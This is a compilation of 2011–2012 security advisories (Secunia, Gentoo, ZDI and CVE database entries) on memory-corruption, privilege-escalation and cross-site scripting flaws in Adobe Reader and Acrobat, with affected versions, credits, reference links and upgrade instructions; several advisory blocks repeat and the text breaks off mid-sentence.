Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors if 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing a ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Reader: Multiple vulnerabilities
Date: January 30, 2012
Bugs: #354211, #382969, #393481
ID: 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in Adobe Reader might allow remote attackers
to execute arbitrary code or conduct various other attacks.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7=20
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could entice a user to open a specially crafted PDF
file using Adobe Reader, possibly resulting in the remote execution of
arbitrary code, a Denial of Service, or other impact.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0022 | CVE-2011-0566 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image, a different vulnerability than CVE-2011-0567 and CVE-2011-0603. Adobe Reader and Acrobat Any code that could be executed or service disruption (DoS) There is a vulnerability that becomes a condition. This vulnerability CVE-2011-0567 and CVE-2011-0603 Is a different vulnerability.Arbitrary code execution or service disruption via a crafted image by a third party (DoS) There is a possibility of being put into a state.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application.
Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow
code execution.
9) An unspecified error may allow code execution.
10) A input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors if 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code
execution.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow
code execution.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing a ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Reader: Multiple vulnerabilities
Date: January 30, 2012
Bugs: #354211, #382969, #393481
ID: 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in Adobe Reader might allow remote attackers
to execute arbitrary code or conduct various other attacks.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7=20
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0023 | CVE-2011-0567 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
AcroRd32.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image that triggers an incorrect pointer calculation, leading to heap memory corruption, a different vulnerability than CVE-2011-0566 and CVE-2011-0603. Adobe Reader and Acrobat Any code that could be executed or service disruption (DoS) There is a vulnerability that becomes a condition. This vulnerability CVE-2011-0566 and CVE-2011-0603 Is a different vulnerability.Arbitrary code execution or service disruption via a crafted image by a third party (DoS) There is a possibility of being put into a state. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within AcroRd32.dll. Initially, a pointer passed to memset can be miscalculated and the resulting copy operation corrupts heap memory. Later, the application attempts to use the modified data which can be leveraged to execute arbitrary code under the context of the user invoking the Reader application.
Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network.
The specific flaw exists within AcroRd32.dll.
-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:
http://www.adobe.com/support/security/bulletins/apsb11-03.html
-- Disclosure Timeline:
2010-06-30 - Vulnerability reported to vendor
2011-02-08 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Abdullah Ada
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
